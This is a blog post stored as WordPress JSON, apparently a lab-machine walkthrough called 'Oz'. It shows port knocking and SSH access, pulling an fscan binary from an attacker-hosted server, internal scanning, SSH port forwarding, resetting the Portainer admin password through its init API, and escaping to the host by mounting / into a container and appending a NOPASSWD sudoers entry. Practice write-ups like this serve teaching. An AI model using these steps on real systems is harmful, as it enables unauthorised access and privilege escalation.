{"id":82,"date":"2024-04-05T15:33:56","date_gmt":"2024-04-05T07:33:56","guid":{"rendered":"http:\/\/xiyu12.top\/?p=82"},"modified":"2024-04-05T15:33:56","modified_gmt":"2024-04-05T07:33:56","slug":"oz","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=82","title":{"rendered":"Oz"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Cracking hashes with hashcat<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Cracking hashes with john<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Port forwarding<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">SSTI injection with curl, reverse shell<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Penetration testing a Docker environment<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Wordlist generation<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">1. Port forwarding<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Log in with <code>knock 192.168.1.160 -u 40809 50212 46969 &amp;&amp; ssh -D 9000 dorthi@192.168.1.160 -i id_rsa<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">After getting a shell, run <code>ip a<\/code> to view the current IP addresses. There are many network interfaces, which suggests that Docker is in use.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Use <a href=\"https:\/\/github.com\/shadow1ng\/fscan.git\">https:\/\/github.com\/shadow1ng\/fscan.git<\/a>, a comprehensive internal-network scanning tool.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Build commands<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>go build -ldflags=\"-s -w \" -trimpath main.go\nupx -9 fscan.exe  # optional: compresses the binary\n\n# run a scan<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 -m http.server 8000\ncurl http:\/\/192.168.1.130:8000\/fscan.elf -O \n.\/fscan.elf -h 172.17.0.1\/24\nstart infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.17.0.2      is 
alive\n(icmp) Target 172.17.0.1      is alive\n&#91;*] Icmp alive hosts len is: 2\n172.17.0.1:8080 open\n172.17.0.2:9000 open\n172.17.0.1:80 open\n172.17.0.1:22 open\n&#91;*] alive ports len is: 4\nstart vulscan\n&#91;*] WebTitle http:\/\/172.17.0.1         code:200 len:75     title:OZ webapi\n&#91;*] WebTitle http:\/\/172.17.0.2:9000    code:200 len:1299   title:Portainer\n&#91;*] WebTitle http:\/\/172.17.0.1:8080    code:302 len:219    title:Redirecting... \u8df3\u8f6curl: http:\/\/172.17.0.1:8080\/login\n&#91;*] WebTitle http:\/\/172.17.0.1:8080\/login code:200 len:2115   title:GBR Support - Login\n\u5df2\u5b8c\u6210 5\/5\n&#91;*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 10.131552852s\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The scan shows a Portainer service at <a href=\"http:\/\/172.17.0.2:9000\">http:\/\/172.17.0.2:9000<\/a>, running on port 9000.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The service runs on the host 172.17.0.2 and cannot be reached directly, but it can be accessed through port forwarding.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>enter\n~C\n-L :5555:172.17.0.2:9000<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Then open http:\/\/127.0.0.1:5555 in a browser to reach the service.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A login is required first.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, there is a way to change the password:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http POST 172.17.0.2:9000\/api\/users\/admin\/init Username=\"admin\" Password=\"df\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">2. Docker escape to the host and privilege escalation<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">When a <code>docker<\/code> container is started with the server's root directory or another sensitive directory mounted into it, a <code>docker<\/code> escape may result.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Privileged-mode escape is one of the simplest and most effective escape methods. In a container started in privileged mode, the <code>docker<\/code> administrator can use the <code>mount<\/code> command to mount the host's disk devices inside the container and gain read and write access to the entire host filesystem. Escaping to the host is then possible by switching the root directory with <code>chroot<\/code>, writing an <code>ssh<\/code> public key, adding a <code>crontab<\/code> scheduled task, and so on.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Portainer is a lightweight management UI for Docker environments. It can be used to manage <a href=\"https:\/\/www.kubernetes.org.cn\/tags\/docker\" target=\"_blank\" rel=\"noreferrer noopener\">docker<\/a> hosts and docker swarm clusters.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>In Portainer, create a new container and choose an alpine image: python:2.7-alpine\nSelect \u201cInteractive &amp; TTY\u201d, then under volumes set \/ and \/rootfs (the host's \/ mounted at \/rootfs in the container)\nClick create, then open the console in the container and connect using \/bin\/sh\nThis gives a shell. Browse \/rootfs and find root.txt in \/rootfs\/root\n<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Then run:\n\/rootfs\/etc # chmod 600 sudoers\n\/rootfs\/etc # echo \"dorthi ALL=(ALL) NOPASSWD: ALL\" >> sudoers<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Cracking hashes with hashcat Cracking hashes with john Port forwarding SSTI injection with curl, reverse shell doc 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[27,38,85,114],"class_list":["post-82","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-docker","tag-httpie","tag-ssh","tag-114"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/82","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=82"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/82\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}